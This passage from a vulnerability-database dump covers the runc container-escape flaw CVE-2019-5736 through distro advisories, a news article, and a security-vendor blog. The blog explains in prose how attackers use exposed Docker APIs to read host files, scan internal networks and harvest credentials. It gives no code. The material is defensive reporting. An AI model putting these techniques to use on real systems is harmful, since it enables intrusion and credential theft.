This occurs\nbecause of file-descriptor mishandling, related to /proc/self/exe.\n\nImpact\n======\n\nA malicious container can escalate privileges to gain access as root on\nthe host system and execute arbitrary code.\n\nReferences\n==========\n\nhttps://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d\nhttps://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b\nhttps://www.openwall.com/lists/oss-security/2019/02/11/2\nhttps://security.archlinux.org/CVE-2019-5736", "modified": "2019-02-11T00:00:00", "published": "2019-02-11T00:00:00", "id": "ASA-201902-6", "href": "https://security.archlinux.org/ASA-201902-6", "type": "archlinux", "title": "[ASA-201902-6] runc: privilege escalation", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-22T18:36:40", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Arch Linux Security Advisory ASA-201902-20\n==========================================\n\nSeverity: High\nDate : 2019-02-17\nCVE-ID : CVE-2019-5736\nPackage : flatpak\nType : privilege escalation\nRemote : Yes\nLink : https://security.archlinux.org/AVG-880\n\nSummary\n=======\n\nThe package flatpak before version 1.2.3-1 is vulnerable to privilege\nescalation.\n\nResolution\n==========\n\nUpgrade to 1.2.3-1.\n\n# pacman -Syu \"flatpak>=1.2.3-1\"\n\nThe problem has been fixed upstream in version 1.2.3.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA vulnerability discovered in runc through 1.0-rc6, as used in Docker\nbefore 18.09.2 and other products, allows attackers to overwrite the\nhost runc binary (and consequently obtain host root access) by\nleveraging the ability to execute a command as root within one of these\ntypes of containers: (1) a new container with an attacker-controlled\nimage, or (2) an existing container, to which the attacker previously\nhad write access, that can be attached with docker exec. 
This occurs\nbecause of file-descriptor mishandling, related to /proc/self/exe.\n\nImpact\n======\n\nA malicious container can escalate privileges to gain access as root on\nthe host system and execute arbitrary code.\n\nReferences\n==========\n\nhttps://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d\nhttps://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b\nhttps://www.openwall.com/lists/oss-security/2019/02/11/2\nhttps://security.archlinux.org/CVE-2019-5736", "modified": "2019-02-17T00:00:00", "published": "2019-02-17T00:00:00", "id": "ASA-201902-20", "href": "https://security.archlinux.org/ASA-201902-20", "type": "archlinux", "title": "[ASA-201902-20] flatpak: privilege escalation", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2020-12-30T19:25:00", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "container-selinux\n[2:2.94-1.git1e99f1d]\n- Resolves: #1690286 - bump to v2.94\n- Resolves: #1693806, #1689255\n[2:2.89-1.git2521d0d]\n- bump to v2.89\nrunc\n[1.0.0-55.rc5.dev.git2abd837]\n- Resolves: CVE-2019-5736", "edition": 2, "modified": "2019-07-30T00:00:00", "published": "2019-07-30T00:00:00", "id": "ELSA-2019-0975", "href": "http://linux.oracle.com/errata/ELSA-2019-0975.html", "title": "container-tools:rhel8 security and bug fix update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:24", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "**Issue Overview:**\n\nA vulnerability was discovered in runc, which is used by Docker to run containers. runc did not prevent container processes from modifying the runc binary via /proc/self/exe. A malicious container could replace the runc binary, resulting in container escape and privilege escalation. 
This was fixed by creating a per-container copy of runc.([CVE-2019-5736 __](<https://access.redhat.com/security/cve/CVE-2019-5736>))\n\n \n**Affected Packages:** \n\n\ndocker\n\n \n**Issue Correction:** \nRun _yum update docker_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n src: \n docker-18.06.1ce-7.25.amzn1.src \n \n x86_64: \n docker-debuginfo-18.06.1ce-7.25.amzn1.x86_64 \n docker-18.06.1ce-7.25.amzn1.x86_64 \n \n \n", "edition": 6, "modified": "2019-02-08T22:28:00", "published": "2019-02-08T22:28:00", "id": "ALAS-2019-1156", "href": "https://alas.aws.amazon.com/ALAS-2019-1156.html", "title": "Important: docker", "type": "amazon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-11-03T07:10:34", "bulletinFamily": "info", "cvelist": ["CVE-2019-5736"], "description": "runc, a building-block project for the container technologies used by many enterprises as well as public cloud providers, has patched a vulnerability that would allow root-level code-execution, container escape and access to the host filesystem.\n\nDiscovered by researchers Adam Iwaniuk and Borys Pop\u0142awski, the vulnerability (CVE-2019-5736) \u201callows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host,\u201d according to a [posting on Monday](<https://www.openwall.com/lists/oss-security/2019/02/11/2>).\n\nAn attacker with local access to the affected system can exploit the flaw by convincing users to run malicious or modified containers on their systems. 
One of runc\u2019s administrators, Aleksa Sarai, who is also a senior software engineer at SUSE Linux GmbH, explained in the posting that an attacker could create a new container using an attacker-controlled software image, or could add any container command (i.e., the \u201cdocker exec\u201d command line in Docker) into an existing container that he or she has write access to; from there, the attacker needs only to convince a user to run the weaponized container within their environment, via various social engineering tactics.\n\n\u201cThis vulnerability overwrites the `runc` binary which is a CLI tool used for starting and running containers,\u201d Ali Golshan, CTO and co-founder at StackRox, explained to Threatpost. \u201cThis method allows the attacker to have root access to the environment, with the eventual goal of exploiting things like zero-day vulnerabilities to enable code-execution. This could allow an attacker to run new containers, exhaust resources or gain access to existing containers.\u201d\n\n## Impact\n\nrunc is the open-source underlying container runtime that powers popular container technologies like Docker, cri-o, containerd and Kubernetes. 
The vulnerable surface is thus potentially vast: Containers allow applications to be more agile and on-demand, and as such have become a de facto standard for architecting cloud services, embraced by enterprises worldwide as well as [Amazon Web Services](<https://aws.amazon.com/containers/>), [Microsoft Azure](<https://azure.microsoft.com/en-us/overview/containers/>) and other cloud providers.\n\nScott McCarty, principal product manager for containers at Red Hat, noted that the flaw represents \u201ca bad scenario for many IT administrators, managers and CxOs,\u201d because of the interconnectedness of container-based cloud infrastructure.\n\n\u201cContainers represent a move back toward shared systems where applications from many different users all run on the same Linux host,\u201d he said in a [Monday blog](<https://www.redhat.com/en/blog/it-starts-linux-how-red-hat-helping-counter-linux-container-security-flaws>). \u201cExploiting this vulnerability means that malicious code could potentially break containment, impacting not just a single container, but the entire container host, ultimately compromising the hundreds-to-thousands of other containers running on it. 
A cascading set of exploits affecting a wide range of interconnected production systems qualifies as a difficult scenario for any IT organization and that\u2019s exactly what this vulnerability represents.\u201d\n\nGolshan told Threatpost, \u201cwhile this is a vulnerability there are comments within the release that \u2018correct use of user namespaces can prevent this; where the host root is not mapped into the container\u2019s user namespace.\u2019 This is a good example of how attack surface can move to the container and orchestrator ecosystem due to a more immature security posture.\u201d\n\n## Who\u2019s Affected and Patch Availability\n\nBy default, Red Hat products are protected by SELinux in enforcing mode; but the vulnerability is not blocked by the default AppArmor policy, nor by the default SELinux policy in the \u201cmoby-engine\u201d package on Fedora (Fedora\u2019s \u201cdocker\u201d package as well as podman are protected, however).\n\nRelated container projects like Apache Mesos and LXC have similar vulnerabilities, according to Sarai; the latter has also patched the issue. 
But the systemd-nspawn project isn\u2019t vulnerable because it attaches to a container using a different method from LXC and runc, Sarai said.\n\n\u201cIt is quite likely that most container runtimes are vulnerable to this flaw, unless they took very strange mitigations beforehand,\u201d said the researcher.\n\nAWS has also issued a [security bulletin](<https://aws.amazon.com/security/security-bulletins/AWS-2019-002/>) and patches for its platforms that use runc.\n\nThe flaw carries a CVSS severity rating of 7.2.\n\n## Container Security in the Spotlight\n\nContainer security has been an increasing topic of late; in January for instance, [researchers said](<https://threatpost.com/hack-allows-escape-of-play-with-docker-containers/140831/>) they hacked the Docker test platform called Play-with-Docker, allowing them to access data and manipulate any test Docker containers running on the host system.\n\nLast year, several malicious Docker images (17 in total) [were pulled down from the Docker Hub image repository](<https://threatpost.com/malicious-docker-containers-earn-crypto-miners-90000/132816/>). Researchers couldn\u2019t say for sure how many times the rogue containers were used by Docker Hub users, but Kromtech estimates that the 17 images were downloaded collectively 5 million times during the year they were available.\n\nAnd Docker [last year patched](<https://threatpost.com/docker-patches-container-escape-vulnerability/123161/>) a privilege escalation vulnerability that could also have led to container escapes, allowing a hacker to affect operations of a host from inside a container.\n\nEnterprises also report an accelerating number of container attacks. In fact, 60 percent of respondents in [a recent survey](<https://threatpost.com/threatlist-container-security/140614/>) admitted that their organizations had been hit with at least one container security incident within the past year. 
In companies with more than 100 containers in place, that percentage rises to 75 percent.\n", "modified": "2019-02-12T18:28:41", "published": "2019-02-12T18:28:41", "id": "THREATPOST:B4C48A638705549FED64000361BA8526", "href": "https://threatpost.com/container-security-flaw-runc/141737/", "type": "threatpost", "title": "Major Container Security Flaw Threatens Cascading Attacks", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2019-03-18T21:01:17", "bulletinFamily": "blog", "cvelist": ["CVE-2019-5736"], "description": "\n\nDocker is a technology that allows you to perform operating system level virtualization. An [incredible number of companies and production hosts](<https://www.zdnet.com/article/what-is-docker-and-why-is-it-so-darn-popular/>) are running Docker to develop, deploy and run applications inside containers. \n\nYou can interact with Docker via the terminal and also via remote API. The Docker remote API is a great way to control your remote Docker host, including automating the deployment process, control and get the state of your containers, and more. With this great power comes a great risk \u2014 if the control gets into the wrong hands, your entire network can be in danger. \n\nIn February, a new vulnerability ([CVE-2019-5736](<https://nvd.nist.gov/vuln/detail/CVE-2019-5736>)) was discovered that allows you to gain host root access from a docker container. The combination of this new vulnerability and exposed remote Docker API can lead to a fully compromised host.\n\nAccording to Imperva research, exposed Docker remote API has already been taken advantage of by hundreds of attackers, including many using the compromised hosts to mine a lesser-known-albeit-rising cryptocurrency for their financial benefit. 
\n\nIn this post you will learn about:\n\n * Publicly exposed Docker hosts we found\n * The risk they can put organizations in\n * Protection methods\n\n# Publicly Accessible Docker Hosts\n\nThe Docker remote API listens on ports 2735 / 2736. [Note: the Docker documentation gives 2375 (unencrypted) and 2376 (TLS) as the conventional daemon ports, so the port figures in this post appear to be transposed.] By default, the remote API is only accessible from the loopback interface (\u201clocalhost\u201d, \u201c127.0.0.1\u201d), and should not be available from external sources. However, as with other cases \u2014 for example, publicly accessible Redis servers such as [RedisWannaMine](<https://www.imperva.com/blog/rediswannamine-new-redis-nsa-powered-cryptojacking-attack/>) \u2014 sometimes organizations are misconfiguring their services, allowing easy access to their sensitive data.\n\nWe used the [Shodan](<https://www.shodan.io/>) search engine to find open ports running Docker.\n\nWe found 3,822 Docker hosts with the remote API **exposed publicly**.\n\nWe wanted to see how many of these IPs are really exposed. In our research, we tried to connect to the IPs on port 2735 and list the Docker images. Out of 3,822 IPs, we found approximately **400 IPs are accessible**.\n\n##### Red indicates Docker images of crypto miners, while green shows production environments and legitimate services \n\nWe found that most of the exposed Docker remote API IPs are running a cryptocurrency miner for a currency called Monero. Monero transactions are obfuscated, meaning it is nearly impossible to track the source, amount, or destination of a transaction. \n\nOther hosts were running what seemed to be production environments of MySQL database servers, Apache Tomcat, and others.\n\n# Hacking with the Docker Remote API \n\nThe possibilities for attackers after spawning a container on hacked Docker hosts are endless. Mining cryptocurrency is just one example. 
They can also be used to:\n\n * Launch more attacks with masked IPs\n * Create a botnet\n * Host services for phishing campaigns\n * Steal credentials and data\n * Pivot attacks to the internal network\n\nHere are some script examples for the above attacks.\n\n## 1\\. Access files on the Docker host and mounted volumes\n\nBy starting a new container and mounting it to a folder in the host, we got access to other files in the Docker host:\n\n \nIt is also possible to access data outside of the host by looking on **container mounts. **Using the **Docker inspect **command, you can find mounts to external storage such as NFS, S3 and more. If the mount has write access, you can also **change the data**.\n\n## 2\\. Scan the internal network\n\nWhen a container is created in one of the predefined Docker network \u201cbridge\u201d or \u201chost,\u201d attackers can use it to access **hosts the Docker host can access** within the internal network. We used [nmap](<https://nmap.org/>) to scan the host network to find services. We did not need to install it, we simply used a ready image from the Docker Hub:\n\nIt is possible to find other open Docker ports and navigate inside the internal network by looking for more Docker hosts as described in our [Redis WannaMine post](<https://www.imperva.com/blog/rediswannamine-new-redis-nsa-powered-cryptojacking-attack/>).\n\n## 3\\. Credentials leakage\n\nIt is very common to pass arguments to a container as environment variables, including credentials such as passwords. You can find examples of passwords sent as environment variables in the documentation of many Docker repositories. \n\nWe found 3 simple ways to detect credentials using the Docker remote API:\n\n### Docker inspect command\n\n### \u201cenv\u201d command on a container\n\nDocker inspect doesn\u2019t return all environment variables. For example, it doesn\u2019t return ones which were passed to docker run using the **-env-file** argument. 
Running \u201cenv\u201d command on a container will return the entire list:\n\n### Credentials files on the host\n\nAnother option is mounting known credentials directories inside the host. For example, AWS credentials have a default location for CLI and other libraries and you can simply start a container with a mount to the known directory and access a credentials file like \u201c~/.aws/credentials\u201d.\n\n## 4\\. Data Leakage\n\nHere is an example of how a database and credentials can be detected, in order to run queries on a MySQL container:\n\n# Wrapping Up\n\nIn this post, we saw how dangerous exposing the Docker API publicly can be. \n\nExposing Docker ports can be useful, and may be required by third-party apps like \u2018[portainer](<https://www.portainer.io/>)\u2019, a management UI for Docker. \n\nHowever, you have to make sure to create security controls that allow only trusted sources to interact with the Docker API. See the Docker documentation on [Securing Docker remote daemon](<https://docs.docker.com/engine/security/https/>).\n\nImperva is going to release a cloud discovery tool to better help IT, network and security administrators answer two important questions:\n\n * What do I have?\n * Is it secure?\n\nThe tool will be able to discover and detect publicly-accessible ports inside the AWS account(s). It will also scan both instances and containers. To try it, please [contact Imperva sales](<https://www.imperva.com/contact-us/>).\n\nWe also saw how credentials stored as environment variables can be retrieved. It is very common and convenient, but far from being secure. Instead of using environment variables, it is possible to read the credentials on runtime (depends on your environment). In AWS you can use roles and [KMS](<https://aws.amazon.com/kms/>). 
In other environments, you can use 3rd party tools like [Vault](<https://www.vaultproject.io/>) or [credstash](<https://github.com/fugue/credstash>).\n\n***\n\nImperva is hosting a [live webinar with Forrester Research on Wednesday March 27 1 PM PT](<https://www.imperva.com/resources/resource-library/webinars/five-best-practices-for-application-defense-in-depth/>) on the topic, \"Five Best Practices for Application Defense in Depth.\" Join Terry Ray, Imperva SVP and Imperva Fellow, Kunal Anand, Imperva CTO, and Forrester principal analyst Amy DeMartine as they discuss how the right multi-layered defense strategy bolstered by real-time visibility to help security analysts distinguish real threats from noise can provide true protection for enterprises using open-source applications in the cloud (such as the Docker hosts above). [Sign up to watch and ask questions live](<https://www.imperva.com/resources/resource-library/webinars/five-best-practices-for-application-defense-in-depth/>) or see the recording!\n\nThe post [Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners](<https://www.imperva.com/blog/hundreds-of-vulnerable-docker-hosts-exploited-by-cryptocurrency-miners/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2019-03-04T21:00:39", "published": "2019-03-04T21:00:39", "id": "IMPERVABLOG:5FB4BD7D34290CD0DF514F5CBED8F4CB", "href": "https://www.imperva.com/blog/hundreds-of-vulnerable-docker-hosts-exploited-by-cryptocurrency-miners/", "type": "impervablog", "title": "Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}